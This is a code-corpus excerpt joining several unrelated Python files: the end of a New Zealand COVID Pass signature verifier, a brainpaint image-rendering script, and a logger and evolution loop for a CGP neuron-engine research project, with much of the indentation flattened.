decoded_payload (dict): decoded CBOR object
"""
try:
for i in [1, 4, 5, 7, 'vc']:
if i not in decoded_payload:
logging.debug("Checking CWT headers: FAIL")
return False
if decoded_payload[1] not in TRUSTED_ISSUERS:
logging.debug("Checking CWT headers: FAIL")
return False
logging.debug("Checking CWT headers: PASS")
return True
except:
logging.debug("Checking CWT headers: FAIL")
return False
def check_exp_date(decoded_payload):
"""
Returns True if the expiry date is in the future
Parameters:
decoded_payload (dict): decoded CBOR object
"""
try:
if datetime.now() > datetime.utcfromtimestamp(decoded_payload[4]):
logging.debug("Checking expiry date: FAIL")
return False
logging.debug("Checking expiry date: PASS")
return True
except:
logging.debug("Checking expiry date: FAIL")
return False
def check_nbf_date(decoded_payload):
"""
Returns True if the not before date is in the past
Parameters:
decoded_payload (dict): decoded CBOR object
"""
try:
if datetime.now() < datetime.utcfromtimestamp(decoded_payload[5]):
logging.debug("Checking not before date: FAIL")
return False
logging.debug("Checking not before date: PASS")
return True
except:
logging.debug("Checking not before date: FAIL")
return False
def decode_UUID(encoded_UUID):
"""Returns the decoded UUID
Parameters:
encoded_UUID (bytes): encoded UUID
"""
try:
if len(encoded_UUID) != 16:
logging.debug("Checking UUID length: FAIL")
return False
result = encoded_UUID.hex()
result = result[0:8] + "-" + result[8:12] + "-" + \
result[12:16] + "-" + result[16:20] + "-" + result[20:32]
result = "urn:uuid:" + result
logging.debug("Decoding UUID: PASS")
return result
except:
logging.debug("Decoding UUID: FAIL")
return False
def get_DID_from_issuer(iss):
"""Returns the DID fetched from the issuer
Parameters:
iss (str): issuer
"""
try:
url = iss.replace("did:web:", "https://")
url += "/.well-known/did.json"
response = urllib.request.urlopen(url)
did_json = json.loads(response.read())
stored_dids[iss] = did_json
logging.debug("Getting DID from issuer: PASS")
return did_json
except:
logging.debug("Getting DID from issuer: FAIL")
return False
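# For example, iss = "did:web:nzcp.identity.health.nz" resolves to
# https://nzcp.identity.health.nz/.well-known/did.json, and the fetched DID document is
# cached in stored_dids for later calls.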
def validate_DID(iss, protected_headers, did):
"""Returns True if the DID is valid
Parameters:
iss (str): issuer
protected_headers (dict): decoded protected headers
did (dict): DID retrieved from the issuer
"""
try:
absolute_key_reference = iss + "#" + protected_headers[4].decode()
if absolute_key_reference not in did["assertionMethod"]:
logging.debug("Validating DID: FAIL")
return False
if did["verificationMethod"][0]["type"] != "JsonWebKey2020":
logging.debug("Validating DID: FAIL")
return False
logging.debug("Validating DID: PASS")
return True
except:
logging.debug("Validating DID: FAIL")
return False
def get_issuer_public_key_from_did(did):
"""Returns the public key from the DID
Parameters:
did (dict): DID retrieved from the issuer
"""
try:
        issuer_public_key = did["verificationMethod"][0]["publicKeyJwk"]
        logging.debug("Extracting public key from issuer DID: PASS")
        return issuer_public_key
except:
logging.debug("Extracting public key from issuer DID: FAIL")
return False
def convert_jwk_to_pem(jwt_public_key):
"""Returns the public key in PEM format
Parameters:
jwt_public_key (dict): public key in JWK format
"""
try:
json_jwt = json.dumps(jwt_public_key)
key = jwk.JWK.from_json(json_jwt)
pem_key = key.export_to_pem()
logging.debug("Converting JWK to PEM: PASS")
return pem_key
except:
logging.debug("Converting JWK to PEM: FAIL")
return False
def generate_sig_structure(protected_headers, payload):
"""Returns the encoded signature structure
Parameters:
protected_headers (dict): decoded protected headers
payload (dict): decoded payload
"""
try:
sig_structure = ["Signature1"]
sig_structure.append(protected_headers)
sig_structure.append(b'') # type: ignore
sig_structure.append(payload)
logging.debug("Generating Sig_structure: PASS")
return dumps(sig_structure)
except:
logging.debug("Generating Sig_structure: FAIL")
return False
def validate_signature(signature, pem_key, message):
"""Returns True if the signature is valid
Parameters:
signature (bytes): digital signature
pem_key (bytes): public key in PEM format
message (bytes): signature structure to be verified
"""
try:
public_key = VerifyingKey.from_pem(pem_key, hashfunc=hashlib.sha256)
result = public_key.verify(signature, message, hashfunc=hashlib.sha256)
logging.debug("Validating digital signature: PASS")
return result
except:
logging.debug("Validating digital signature: FAIL")
return False
def construct_response(validated, decoded_COSE_payload=None, uuid=None, error=None):
"""Returns the correctly formatted response to be sent to the client
Parameters:
validated (bool): True if the NZCP is valid
decoded_COSE_payload (dict): decoded COSE payload (default None)
uuid (str): UUID (default None)
"""
# EXAMPLE VALIDATED RESPONSE
# {
# "verified": true,
# "payload": {
# "givenName": "Samantha",
# "familyName": "Gill",
# "dob": "1984-08-07"
# },
# "metadata": {
# "expiry": "2022-02-20T12:34:56.000Z",
# "notBefore": "2020-01-20T12:34:56.000Z",
# "id": "urn:uuid:850a1de1-f890-4be5-b105-d721e5f3bc98",
# "issuer": "did:web:example.com",
# "type": "PublicCovidPass"
# }
# }
res = {}
try:
if validated:
res["verified"] = validated
res["payload"] = decoded_COSE_payload["vc"]["credentialSubject"]
res["metadata"] = {}
res["metadata"]["expiry"] = datetime.utcfromtimestamp(
decoded_COSE_payload[4]).isoformat()
res["metadata"]["notBefore"] = datetime.utcfromtimestamp(
decoded_COSE_payload[5]).isoformat()
res["metadata"]["id"] = uuid
res["metadata"]["issuer"] = decoded_COSE_payload[1]
res["metadata"]["type"] = decoded_COSE_payload["vc"]["type"][1]
logging.debug("Constructing response: PASS")
return res
else:
res["verified"] = validated
if error:
res["error"] = error
else:
res["error"] = "Unknown error"
logging.debug("Constructing response: PASS")
return res
except:
logging.debug("Constructing response: FAIL")
res["verified"] = False
res["error"] = "Unknown error"
return res
def check_code(code_to_check):
"""Checks whether NZCP is valid and returns the response to be sent to the client
Parameters:
code_to_check (str): NZCP to be checked
"""
try:
base32_input_without_prefix = check_and_remove_prefix(code_to_check)
if not base32_input_without_prefix:
return construct_response(False, error="Error checking NZCP prefix")
base32_input = check_and_remove_version(base32_input_without_prefix)
if not base32_input:
return construct_response(False, error="Error checking NZCP version number")
padded = add_base32_padding(base32_input)
decoded = decode_base32(padded)
if not decoded:
return construct_response(False, error="Error decoding base32")
decoded_COSE_structure = decode_cbor(decoded).value # type: ignore
if not decoded_COSE_structure:
return construct_response(False, error="Error decoding CBOR")
decoded_COSE_protected_headers = decode_cbor(decoded_COSE_structure[0])
if not decoded_COSE_protected_headers:
return construct_response(False, error="Error decoding CBOR")
decoded_COSE_payload = decode_cbor(decoded_COSE_structure[2])
if not decoded_COSE_payload:
return construct_response(False, error="Error decoding CBOR")
if not check_cwt_claims(decoded_COSE_payload):
return construct_response(False, error="Error checking CWT claims")
if not check_exp_date(decoded_COSE_payload):
return construct_response(False, error="Expiry date is in the past")
if not check_nbf_date(decoded_COSE_payload):
return construct_response(False, error="Not before date is in the future")
decoded_UUID = decode_UUID(decoded_COSE_payload[7])
if not decoded_UUID:
return construct_response(False, error="Error decoding UUID")
if decoded_COSE_payload[1] in stored_dids:
did_json = stored_dids[decoded_COSE_payload[1]]
else:
did_json = get_DID_from_issuer(decoded_COSE_payload[1])
if not did_json:
return construct_response(False, error="Error retrieving DID from issuer")
if not validate_DID(decoded_COSE_payload[1], decoded_COSE_protected_headers, did_json):
return construct_response(False, error="Error validating DID")
signature = decoded_COSE_structure[3]
issuer_public_key = get_issuer_public_key_from_did(did_json)
if not issuer_public_key:
return construct_response(False, error="Error extracting public key from issuer DID")
pem_key = convert_jwk_to_pem(issuer_public_key)
to_be_signed = generate_sig_structure(
decoded_COSE_structure[0], decoded_COSE_structure[2])
if not to_be_signed:
return construct_response(False, error="Error generating Sig_structure")
validated = validate_signature(signature, pem_key, to_be_signed)
if not validated:
return construct_response(False, error="Error validating digital signature")
return construct_response(validated, decoded_COSE_payload, decoded_UUID)
except:
return construct_response(False)
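# Illustrative usage (the pass string below is a truncated placeholder, not a real NZCP):
#     result = check_code("NZCP:/1/2KCEVIQEIVVWK6...")
#     if result["verified"]:
#         print(result["payload"]["givenName"], result["metadata"]["expiry"])
#     else:
#         print(result["error"])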
def main():
logging.warning("Run application.py to start the server")
if __name__ == "__main__":
main()
``` |
{
"source": "jonoddram/brainpaint",
"score": 4
} |
#### File: jonoddram/brainpaint/createimage.py
```python
import brainfrick
import argparse
import binary_support
from PIL import Image
import math
"""
Works by reading off 3 cell values for each pixel going in order rgb from the memory contents of the brainfrick VM
after finishing execution of loaded program.
"""
parse = argparse.ArgumentParser(description="Input parameters for brainpaint")
parse.add_argument("--input_path", help="Path to brainfrick code")
parse.add_argument("--output_path", help="Path where output should be saved")
parse.add_argument("--xdim", help="Specifies the x-dimension of the output image")
parse.add_argument("--ydim", help="Specifies the y-dimension of the output image")
args = vars(parse.parse_args())
code_file = open(args["input_path"], 'r')
program = code_file.read()
code_file.close()
bf = brainfrick.Brainfrick(30000, 9) # using 9-bit cells: rgb values are given between 0 and 255, and the msb
# is used as the sign bit (negative numbers don't make sense for images but it does make sense to
# support them in the other functions)
bf.insert_program(program)
bf.run()
memory = bf.memory
dim1, dim2 = int(args["xdim"]), int(args["ydim"])
last_index = dim1*dim2*3
memory = memory[:last_index]
new_memory = []
# make every number positive
for bin_num in memory:
num = binary_support.make_integer(bin_num)
if num < 0:
num = -num
new_memory.append(num)
# map every number to a value between 0 and 255, use this if changing bits per cell
# map256 = binary_support.map_to(max(new_memory)-min(new_memory), 256)
# memory_map256 = map(map256, new_memory)
# deprecated in favour of user specified image dimensions
def approximate_dimensions(size):
size = size/3 # because there are 3 cells per pixel
square = math.sqrt(size)
return int(math.ceil(square)), int(math.ceil(square))
image = Image.new("RGBA", (dim1, dim2))
for num1 in range(dim2):
# for each row
for num2 in range(dim1):
# for each column
        cellsInPreviousRows = num1*dim1 # number of rows already visited * length of a row
        nextRed = (cellsInPreviousRows+num2)*3 # index of this pixel's red cell: pixels in previous rows plus pixels
        # already visited in this row, times three since there are three memory cells per pixel
val1, val2, val3 = new_memory[nextRed], new_memory[nextRed+1], new_memory[nextRed+2] # Going in order RGB
print(num2, num1)
image.putpixel((num2, num1), (val1, val2, val3, 255)) # (num2, num1) since num1 is y and num2 is x
image.save(args["output_path"])
image.close()
``` |
{
"source": "jonoddram/CGP_Neuron_Masters",
"score": 2
} |
#### File: jonoddram/CGP_Neuron_Masters/Logger.py
```python
import os.path
import json
import time
import yaml
from os import mkdir
class Logger:
def __init__(self, output_dir, ignored_messages_list = [], enabled = True) -> None:
self.output_dir = output_dir + str(time.time())
mkdir(self.output_dir)
self.ignored_messages_list = ignored_messages_list
self.intermediary_output_dir = ""
self.intermediary_intermediary_output_dir = ""
self.message_type_to_filepath = {
"cgp_function_exec_prio1" : "exec_message_log.txt",
"cgp_function_exec_prio2" : "exec_message_log.txt",
"CGPProgram image" : "cgp_program_image.txt",
"neuron_image" : "neuron_image.txt",
"graphlog_instance" : "graphlogs_instances.txt",
"graphlog_run" : "graphlog_run.txt",
"setup_info" : "setup_info.txt"
}
self.buffer = []
self.enabled = enabled
def log_statistic_data(self, statistic_data):
with open(os.path.join(self.output_dir, "statistics.yml"), 'w') as f:
yaml.dump(statistic_data, f)
def log(self, message_type, message):
if self.enabled:
if message_type not in self.ignored_messages_list:
if message_type == "instance_end":
if len(self.buffer) > 0:
with open(self.intermediary_intermediary_output_dir + "/rundat.txt", 'a') as f:
f.writelines("\n".join(self.buffer))
self.buffer = []
elif message_type == "run_start":
self.intermediary_output_dir = self.output_dir + f"/{message[0]}"
mkdir(self.intermediary_output_dir)
self.intermediary_output_dir = self.output_dir + f"/{message[0]}/{message[1]}"
mkdir(self.intermediary_output_dir)
elif message_type == "instance_start":
self.intermediary_intermediary_output_dir = self.intermediary_output_dir + f"/{message}"
mkdir(self.intermediary_intermediary_output_dir)
elif message_type == "engine_action" or message_type == "instance_solution" or message_type == "instance_results" or message_type == "reward_phase" or message_type == "run_end":
self.buffer.append(f"{message}")
else:
with open(os.path.join(self.output_dir, self.message_type_to_filepath[message_type]), 'a') as f:
f.writelines(message + "\n")
def log_cgp_program(self, active_nodes, output_nodes):
if self.enabled:
node_types = [f"({node.id}, {node.gettype()})" for node in active_nodes]
connection_pairs = []
for node in active_nodes:
for subscriber in node.subscribers:
connection_pairs.append(f"({node.id}, {subscriber.id})")
self.log(
"CGPProgram image",
"Active nodes: " + ", ".join(node_types) + "\n" +
"Connection pairs: " + ", ".join(connection_pairs) + "\n" +
"Output_nodes: " + ", ".join([str(node.id) for node in output_nodes])
)
def log_json(self, message_type, json_data):
if self.enabled:
if message_type not in self.ignored_messages_list:
# Log json
with open(os.path.join(self.output_dir, self.message_type_to_filepath[message_type]), 'a') as f:
json.dump(json_data, f)
f.write("|")
```
#### File: jonoddram/CGP_Neuron_Masters/MainController.py
```python
import time
import json
from numpy import diag
from engine import NeuronEngine
from genotype import Genome
import Logger
import stupid_problem_test
import random
from HelperClasses import Counter, randchoice, copydict, randcheck, copydict
import os
from multiprocessing import Pool
def multiprocess_code(engine_problem):
engine = engine_problem[0]
problem = engine_problem[1]
num = engine_problem[2]
to_return = engine.run(problem, num)
return to_return
def log_genome(genomes, runinfo):
for genome in genomes:
initial_data = {
"genome id" : genome[0].id,
"genome fitness" : genome[1],
"run" : runinfo
}
genome[0].log(initial_data)
def process_config(config):
config = dict(config)
for key, val in config.items():
if "," in val:
config[key] = val.split(',')
if config[key][0].isnumeric():
for num2 in range(len(config[key])):
config[key][num2] = int(config[key][num2])
elif "." in val:
config[key] = float(val)
elif config[key] == "False":
config[key] = False
elif config[key] == "True":
config[key] = True
else:
nums = [str(x) for x in range(0, 10)]
for num in nums:
if num in val:
config[key] = int(val)
break
return config
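# A minimal illustration of what process_config produces (hypothetical values, not taken from config.ini):
#   '42'                      -> 42
#   '0.05'                    -> 0.05
#   'True'                    -> True
#   'graphlog_run,setup_info' -> ['graphlog_run', 'setup_info']
#   '1,2,3'                   -> [1, 2, 3]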
def run(config, print_output = False):
# Setup problems
problem = stupid_problem_test.StupidProblem()
# Setup logging
# ["CGPProgram image", "cgp_function_exec_prio1", "cgp_function_exec_prio2", "graphlog_instance", "graphlog_run", "setup_info"]
logger = Logger.Logger(os.path.join(os.path.dirname(__file__), "logfiles") + "\\log", config['logger_ignore_messages'], config['advanced_logging'])
# Setup CGP genome
# - define a counter
counter = Counter()
neuron_internal_states = config['neuron_internal_state_count']
dendrite_internal_states = config['axon_dendrite_internal_state_count']
signal_dimensionality = config['signal_dimensionality']
dimensions = 3 # other dimensions not supported - code in engine.py specific to 3d grid
hox_variant_count = config['hox_variant_count']
genome_counter = Counter()
genome_count = config['genome_count']
seed = config['seed']
random.seed(seed)
estimated_calls = 1.1*config['genome_count']*config['iterations']*config['cgp_program_size']*config['actions_max']*2*config['instances_per_iteration']
print(f"Estimated upper limit to calls to CGP node primitives: {estimated_calls}")
print(f"Estimated total computation time at upper limit: {500*estimated_calls/1600000} seconds")
print(f"Based on limited empirical data actual computation time will often be up to 70 times as low.")
logger.log_json("setup_info", dict(config))
# - define the function arities
    # also define canonical order of functions - arbitrary, for compatibility with
# neuron code
# RFE move out this order to some single source of knowledge
neuron_function_order = [
'axon_birth_program',
'signal_axon_program',
'recieve_axon_signal_program',
'recieve_reward_program',
'move_program',
'die_program',
'neuron_birth_program',
'action_controller_program',
'hox_variant_selection_program',
'internal_state_variable_count' # not function but parameter comes here in the order
]
neuron_function_arities = [ # by order above
[dimensions+neuron_internal_states+1 + len(config['cgp_function_constant_numbers']), 4+signal_dimensionality+neuron_internal_states], # axon birth
[signal_dimensionality+dimensions+neuron_internal_states + len(config['cgp_function_constant_numbers']), 2 + signal_dimensionality + neuron_internal_states], # signal axon
[signal_dimensionality + dimensions + neuron_internal_states + len(config['cgp_function_constant_numbers']), 2 + neuron_internal_states+signal_dimensionality], # recieve signal axon
        [1 + dimensions + neuron_internal_states + len(config['cgp_function_constant_numbers']), 2 + neuron_internal_states], # receive reward
[neuron_internal_states + dimensions + len(config['cgp_function_constant_numbers']), 7+neuron_internal_states], # move
[dimensions + neuron_internal_states + len(config['cgp_function_constant_numbers']), 2+neuron_internal_states], # die
[dimensions + neuron_internal_states + len(config['cgp_function_constant_numbers']), 2+neuron_internal_states*2], # neuron birth
[neuron_internal_states+dimensions + len(config['cgp_function_constant_numbers']), 9], # action controller
[neuron_internal_states + dimensions + len(config['cgp_function_constant_numbers']), hox_variant_count] # hox selection
]
dendrite_function_order = [
'recieve_signal_neuron_program',
'recieve_signal_dendrite_program',
'signal_dendrite_program',
'signal_neuron_program',
'accept_connection_program',
'break_connection_program',
'recieve_reward_program',
'die_program',
'action_controller_program'
]
dendrite_function_arities = [
[dendrite_internal_states + signal_dimensionality + dimensions + len(config['cgp_function_constant_numbers']), 2+signal_dimensionality+dendrite_internal_states],
[dendrite_internal_states + signal_dimensionality + dimensions + len(config['cgp_function_constant_numbers']), 2+signal_dimensionality+dendrite_internal_states],
[dimensions + dendrite_internal_states + signal_dimensionality + len(config['cgp_function_constant_numbers']), 4+signal_dimensionality+dendrite_internal_states],
[dimensions + dendrite_internal_states + signal_dimensionality + len(config['cgp_function_constant_numbers']), 4+signal_dimensionality+dendrite_internal_states],
[dimensions + dendrite_internal_states + dimensions + dendrite_internal_states + len(config['cgp_function_constant_numbers']), 2+dendrite_internal_states], # Accept connection
[dimensions + dendrite_internal_states + dimensions + dendrite_internal_states + len(config['cgp_function_constant_numbers']), 1], # Break connection
[dimensions + dendrite_internal_states + 1 + len(config['cgp_function_constant_numbers']), 2 + dendrite_internal_states], # recieve reward
[dimensions + dendrite_internal_states + len(config['cgp_function_constant_numbers']), 1+signal_dimensionality], # die
[dendrite_internal_states + dimensions + len(config['cgp_function_constant_numbers']), 3]
]
# Knowledge duplication thooo
def genome_to_init_data(genome):
neuron_init_data = {
'axon_birth_programs' : genome.function_chromosomes[0],
'signal_axon_programs' : genome.function_chromosomes[1],
'recieve_axon_signal_programs': genome.function_chromosomes[2],
'recieve_reward_programs': genome.function_chromosomes[3],
'move_programs': genome.function_chromosomes[4],
'die_programs': genome.function_chromosomes[5],
'neuron_birth_programs': genome.function_chromosomes[6],
'action_controller_programs': genome.function_chromosomes[7],
'hox_variant_selection_program': genome.hex_selector_genome.program,
'internal_state_variable_count': neuron_internal_states
}
axon_init_data = {
'recieve_signal_neuron_programs' : genome.function_chromosomes[8],
'recieve_signal_dendrite_programs' : genome.function_chromosomes[9],
'signal_dendrite_programs' : genome.function_chromosomes[10],
'signal_neuron_programs' : genome.function_chromosomes[11],
'accept_connection_programs' : genome.function_chromosomes[12],
'break_connection_programs' : genome.function_chromosomes[13],
'recieve_reward_programs' : genome.function_chromosomes[14],
'die_programs' : genome.function_chromosomes[15],
'action_controller_programs' : genome.function_chromosomes[16],
'internal_state_variable_count': dendrite_internal_states
}
return neuron_init_data, axon_init_data
genome_successor_count = 4
if not config['non_crossover_children']:
genome_successor_count = 2
# initialize the genome(s)
all_function_arities = neuron_function_arities + dendrite_function_arities
genomes = []
for num in range(genome_count):
genomes.append(Genome(
homeobox_variants = hox_variant_count,
successor_count = genome_successor_count,
input_arities = all_function_arities,
counter = counter,
internal_state_variables = neuron_internal_states,
names = neuron_function_order[:-1] + dendrite_function_order,
logger = logger,
genome_counter = genome_counter,
config = config)) # TODO RN assumes equal amount of axon and neuron internal state variables
from engine import NeuronEngine
# learning loop
to_return_fitness = []
learning_iterations = config['iterations']
grid_count = config['grid_count']
grid_size = config['grid_size']
actions_max = config['actions_max']
instances_per_iteration = config['instances_per_iteration']
genome_results = []
neuron_init, axon_init = genome_to_init_data(genomes[0])
for genome in genomes:
engine = NeuronEngine(
input_arity = problem.input_arity,
output_arity = problem.output_arity,
grid_count = grid_count,
grid_size = grid_size,
actions_max = actions_max,
neuron_initialization_data = neuron_init,
axon_initialization_data = axon_init,
signal_arity = signal_dimensionality,
hox_variant_count = hox_variant_count,
instances_per_iteration = instances_per_iteration,
logger = logger,
genome_id = genome.id,
config_file = copydict(config)
)
result, base_problems = engine.run(problem, "setup")
genome_results.append((result, base_problems))
genomes = list(zip(genomes, [x[0] for x in genome_results], [x[1] for x in genome_results]))
    to_return_fitness.append([x[0] for x in genome_results])
log_genome(genomes, 0)
diagnostic_data = {}
diagnostic_data['config'] = copydict(config)
diagnostic_data['iterations'] = []
print("Setup complete. Beginning evolution.")
for num in range(learning_iterations):
statistic_entry = {}
time_genes = 0
time_eval = 0
time_genes_post = 0
time_genes_selection = 0
time_genes_crossover = 0
time_genes_skip_check = 0
egligable_bachelors = [x[0] for x in genomes]
child_data = [[] for _ in range(len(genomes))]
while len([x for x in egligable_bachelors if x is not None]) > 0:
time_genes_stamp = time.time()
time_genes_selection_stamp = time.time()
choice1 = randchoice([x for x in egligable_bachelors if x is not None])
choice2 = randchoice([x for x in egligable_bachelors if x is not None])
indexes = [egligable_bachelors.index(choice1), egligable_bachelors.index(choice2)]
egligable_bachelors[egligable_bachelors.index(choice1)] = None # Currently possible to do crossover with self, which does make some sense with subgraph extraction
if choice2 in egligable_bachelors and choice2 != choice1:
egligable_bachelors[egligable_bachelors.index(choice2)] = None
time_genes_selection += time.time() - time_genes_selection_stamp
time_genes_crossover_stamp = time.time()
new_genomes = choice1.crossover(choice2)
time_genes_crossover += time.time() - time_genes_crossover_stamp
time_genes_skip_check_stamp = time.time()
skip_eval = [False for num in range(len(new_genomes))]
for numero in range(len(new_genomes)):
genome = new_genomes[numero]
if genome.equals_no_id(choice1):
skip_eval[numero] = 1
if genome.equals_no_id(choice2):
skip_eval[numero] = 2
time_genes_skip_check += time.time() - time_genes_skip_check_stamp
genome_results = []
time_genes += time.time() - time_genes_stamp
time_eval_stamp = time.time()
engine_problems = []
for numero in range(len(new_genomes)):
genome = new_genomes[numero]
if not skip_eval[numero]:
neuron_initialization_data, axon_initialization_data = genome_to_init_data(genome)
engine = NeuronEngine(
input_arity = problem.input_arity,
output_arity = problem.output_arity,
grid_count = grid_count,
grid_size = grid_size,
actions_max = actions_max,
neuron_initialization_data = neuron_initialization_data,
axon_initialization_data = axon_initialization_data,
signal_arity = signal_dimensionality,
hox_variant_count = hox_variant_count,
instances_per_iteration = instances_per_iteration,
logger = logger,
genome_id = genome.id,
config_file = copydict(config)
)
engine_problems.append((engine, problem, num))
elif skip_eval[numero] == 1:
genome_results.append((genomes[indexes[0]][1], genomes[indexes[0]][2]))
else:
genome_results.append((genomes[indexes[1]][1], genomes[indexes[1]][2]))
with Pool() as p:
results = p.map(multiprocess_code, engine_problems)
genome_results += results
#for numero in range(len(new_genomes)):
# genome = new_genomes[numero]
# if not skip_eval[numero]:
# neuron_initialization_data, axon_initialization_data = genome_to_init_data(genome)
# engine = NeuronEngine(
# input_arity = problem.input_arity,
# output_arity = problem.output_arity,
# grid_count = grid_count,
# grid_size = grid_size,
# actions_max = actions_max,
# neuron_initialization_data = neuron_initialization_data,
# axon_initialization_data = axon_initialization_data,
# signal_arity = signal_dimensionality,
# hox_variant_count = hox_variant_count,
# instances_per_iteration = instances_per_iteration,
# logger = logger,
# genome_id = genome.id,
# config_file = copydict(config)
# )
# genome_results.append(engine.run(problem, num))
# elif skip_eval[numero] == 1:
# genome_results.append((genomes[indexes[0]][1], genomes[indexes[0]][2]))
# else:
# genome_results.append((genomes[indexes[1]][1], genomes[indexes[1]][2]))
time_eval += time.time() - time_eval_stamp
time_genes_stamp = time.time()
base_problems = [x[1] for x in genome_results]
genome_results = [x[0] for x in genome_results]
# all children of a parent compete for the parents spots
for x in range(len(new_genomes)):
child_data[indexes[0]].append((new_genomes[x], genome_results[x], base_problems[x]))
child_data[indexes[1]].append((new_genomes[x], genome_results[x], base_problems[x]))
time_genes += time.time() - time_genes_stamp
time_genes_post_stamp = time.time()
change_better = [False for x in range(len(genomes))]
change_neutral = [False for x in range(len(genomes))]
for num3 in range(len(child_data)):
score_view = [x[1] for x in child_data[num3]]
score_min = min(score_view)
min_index = score_view.index(score_min)
if score_min <= genomes[num3][1]:
if score_min < genomes[num3][1]:
change_better[num3] = True
else:
change_neutral[num3] = True
genomes[num3] = child_data[num3][min_index]
for num3 in range(len(genomes)):
genome = genomes[num3][0]
x = (genome.config['mutation_chance_node']+genome.config['mutation_chance_link'])/2
genome.config['mutation_chance_link'] = x
genome.config['mutation_chance_node'] = x
if change_better[num3]:
pass
elif change_neutral[num3]:
genome.config['mutation_chance_node'] = min(genome.config['max_mutation_chance_node'], genome.config['mutation_chance_node']*config['neutral_mutation_chance_node_multiplier'])
genome.config['mutation_chance_link'] = min(genome.config['max_mutation_chance_link'], genome.config['mutation_chance_link']*config['neutral_mutation_chance_link_multiplier'])
else:
if not(genome.hypermutation):
genome.config['mutation_chance_node'] *= config['fail_mutation_chance_node_multiplier']
genome.config['mutation_chance_link'] *= config['fail_mutation_chance_link_multiplier']
if genome.config['mutation_chance_node'] < 0.000001:
genome.hypermutation = True
else:
genome.config['mutation_chance_node'] = config['hypermutation_mutation_chance']
genome.config['mutation_chance_link'] = config['hypermutation_mutation_chance']
genome.update_config()
times_a_genome_took_population_slot_from_other_genome = 0
average_takeover_probability = 0
for num4 in range(config['genome_replacement_tries']):
genome_one = randchoice(genomes)
genome_two = randchoice([x for x in genomes if x is not genome_one])
diff = abs(genome_one[1] - genome_two[1])
maxi = max(genome_one[1], genome_two[1])
average_takeover_probability += diff*config['replacement_fitness_difference_scaling']/maxi
if diff > config['replacement_fitness_difference_threshold']:
if randcheck(diff*config['replacement_fitness_difference_scaling']/maxi):
if genome_one[1] > genome_two[1]:
genomes[genomes.index(genome_two)] = genome_one
else:
genomes[genomes.index(genome_one)] = genome_two
times_a_genome_took_population_slot_from_other_genome += 1
if times_a_genome_took_population_slot_from_other_genome != 0:
average_takeover_probability = average_takeover_probability/config['genome_replacement_tries']
statistic_entry["genome_replacement_stats"] = {
"times_a_genome_took_population_slot_from_other_genome" : times_a_genome_took_population_slot_from_other_genome,
"average_takover_probability" : average_takeover_probability
}
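        # Worked example of the replacement probability above (hypothetical numbers): with fitness
        # values 10 and 8 and replacement_fitness_difference_scaling = 0.5, diff = 2 and maxi = 10,
        # so randcheck is called with 2 * 0.5 / 10 = 0.1, i.e. a 10% chance that one genome
        # overwrites the other's population slot.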
time_genes_post += time.time() - time_genes_post_stamp
#print(num, [f"{x[1]}, {x[2]}" for x in genomes])
print(f"------------------- {num} ------------------")
print(f"genes:{time_genes}, genes_selection:{time_genes_selection}, genes_crossover:{time_genes_crossover}, " +\
f"genes_skip_check:{time_genes_skip_check}, eval:{time_eval}, genes_post:{time_genes_post}")
statistic_entry['iteration'] = num
time_statistic_entry = {
"genes":time_genes,
"genes_selection":time_genes_selection,
"genes_crossover":time_genes_crossover,
"genes_skip_check":time_genes_skip_check,
"eval":time_eval,
"genes_post":time_genes_post
}
statistic_entry['time'] = time_statistic_entry
genomes_data = {
"genome_list":[]
}
for genome in genomes:
module_list, _ = genome[0].add_cgp_modules_to_list([], genome[0])
module_list_recursive, module_max_depth = genome[0].add_cgp_modules_to_list([], genome[0], True)
node_type_counts = genome[0].get_node_type_counts()
total_active_nodes = sum(node_type_counts.values())
genome_entry = {
"id":genome[0].id,
"fitness":genome[1],
"performance_stats":genome[2],
"node_mutation_chance":genome[0].config['mutation_chance_node'],
"link_mutation_chance":genome[0].config['mutation_chance_link'],
"module_count_non_recursive":len(module_list),
"module_count_recursive":len(module_list_recursive),
"cgp_node_types": node_type_counts
}
genomes_data["genome_list"] += [genome_entry]
print()
print(genome[0].id)
print(genome[1])
print(genome[2])
print(genome[0].config['mutation_chance_node'], genome[0].config['mutation_chance_link'])
statistic_entry['genomes_data'] = genomes_data
diagnostic_data['iterations'] += [statistic_entry]
to_return_fitness.append([x[1] for x in genomes])
log_genome(genomes, num)
#_genomes = [x[0] for x in genomes]
#for gen in _genomes:
# print(str(gen))
logger.log_statistic_data(diagnostic_data)
return to_return_fitness, diagnostic_data
if __name__ == "__main__":
import configparser
config = configparser.ConfigParser()
config.read('config.ini')
config = config["Default"]
config = process_config(config)
if config['mode'] == 'run':
print("Running evolution")
import cProfile
cProfile.run("run(config, print_output=True)")
#run(config, print_output=True)
elif config['mode'][0] == 'load':
# TODO not fully implemented
# TODO if fully implementing unify code with run function better, outdated due to code duplications
print("Loading program")
loadfile = config['mode'][1]
loadprogram = config['mode'][2]
# get specific cgp program
with open(loadfile, 'r') as f:
data = f.readlines()
data = data[0]
genomes = data.split('|')
correct_genome = None
for genome in genomes:
gene_dat = json.loads(genome)
if gene_dat['genome_id'].split("->")[1][1:] == loadprogram:
correct_genome = gene_dat
break
if correct_genome is None:
print(f"Genome {loadprogram} not found")
else:
print("Genome found")
neuron_internal_states = config['neuron_internal_state_count']
dendrite_internal_states = config['axon_dendrite_internal_state_count']
signal_dimensionality = config['signal_dimensionality']
dimensions = 3 # other dimensions not supported - code in engine.py specific to 3d grid
hox_variant_count = config['hox_variant_count']
genome_counter = Counter()
genome_count = config['genome_count']
seed = config['seed']
random.seed(seed)
neuron_function_order = [
'axon_birth_program',
'signal_axon_program',
'recieve_axon_signal_program',
'recieve_reward_program',
'move_program',
'die_program',
'neuron_birth_program',
'action_controller_program',
'hox_variant_selection_program',
'internal_state_variable_count' # not function but parameter comes here in the order
]
neuron_function_arities = [ # by order above
[dimensions+neuron_internal_states+1, 4+signal_dimensionality+neuron_internal_states], # axon birth
[signal_dimensionality+dimensions+neuron_internal_states, 2 + signal_dimensionality + neuron_internal_states], # signal axon
[signal_dimensionality + dimensions + neuron_internal_states, 2 + neuron_internal_states+signal_dimensionality], # recieve signal axon
                [1 + dimensions + neuron_internal_states, 2 + neuron_internal_states], # receive reward
[neuron_internal_states + dimensions, 7+neuron_internal_states], # move
[dimensions + neuron_internal_states, 2+neuron_internal_states], # die
[dimensions + neuron_internal_states, 2+neuron_internal_states*2], # neuron birth
[neuron_internal_states+dimensions, 9], # action controller
[neuron_internal_states + dimensions, hox_variant_count] # hox selection
]
dendrite_function_order = [
'recieve_signal_neuron_program',
'recieve_signal_dendrite_program',
'signal_dendrite_program',
'signal_neuron_program',
'accept_connection_program',
'break_connection_program',
